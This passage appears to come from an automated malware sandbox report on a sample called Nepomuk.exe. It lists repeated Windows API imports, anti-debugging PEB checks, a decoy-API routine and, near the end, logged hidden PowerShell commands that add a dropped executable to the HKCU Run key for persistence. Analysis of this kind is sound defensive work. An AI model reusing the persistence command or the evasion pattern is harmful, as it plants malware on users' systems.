owExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF16C0 mov eax, dword ptr fs:[00000030h]0_2_00EF16C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF12B0 mov eax, dword ptr fs:[00000030h]0_2_00EF12B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2380 mov eax, dword ptr fs:[00000030h]0_2_00EF2380
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2380 mov eax, dword ptr fs:[00000030h]0_2_00EF2380
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF1000 mov eax, dword ptr fs:[00000030h]0_2_00EF1000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015B0000 mov ecx, dword ptr fs:[00000030h]0_2_015B0000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015B0B20 mov eax, dword ptr fs:[00000030h]0_2_015B0B20
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009512B0 mov eax, dword ptr fs:[00000030h]7_2_009512B0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_00952550 mov eax, dword ptr fs:[00000030h]7_2_00952550
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009522C0 mov eax, dword ptr fs:[00000030h]7_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009522C0 mov eax, dword ptr fs:[00000030h]7_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009516C0 mov eax, dword ptr fs:[00000030h]7_2_009516C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_00951000 mov eax, dword ptr fs:[00000030h]7_2_00951000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_018D0000 mov ecx, dword ptr fs:[00000030h]7_2_018D0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_018D0B20 mov eax, dword ptr fs:[00000030h]7_2_018D0B20
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009512B0 mov eax, dword ptr fs:[00000030h]10_2_009512B0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_00952550 mov eax, dword ptr fs:[00000030h]10_2_00952550
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009522C0 mov eax, dword ptr fs:[00000030h]10_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009522C0 mov eax, dword ptr fs:[00000030h]10_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009516C0 mov eax, dword ptr fs:[00000030h]10_2_009516C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_00951000 mov eax, dword ptr fs:[00000030h]10_2_00951000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_032C0000 mov ecx, dword ptr fs:[00000030h]10_2_032C0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_032C0B20 mov eax, dword ptr fs:[00000030h]10_2_032C0B20
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 13_2_012E0000 mov ecx, dword ptr fs:[00000030h]13_2_012E0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 13_2_012E0B20 mov eax, dword ptr fs:[00000030h]13_2_012E0B20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF1000 ?DecoyAPICalls@@YAXXZ,GetSystemMetrics,GetModuleHandleW,GetTickCount,GetProcessHeap,GetModuleHandleW,GetProcAddress,GetCurrentProcess,VirtualQuery,0_2_00EF1000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\appdata\local\temp\t68wj1sm1u30wfln7xxtlwox8.exe\" }"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\appdata\local\temp\t68wj1sm1u30wfln7xxtlwox8.exe\" }"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\appdata\local\temp\t68wj1sm1u30wfln7xxtlwox8.exe\" }"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\appdata\local\temp\t68wj1sm1u30wfln7xxtlwox8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\appdata\local\temp\t68wj1sm1u30wfln7xxtlwox8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\appdata\local\temp\t68wj1sm1u30wfln7xxtlwox8.exe\" }"Jump to behavior
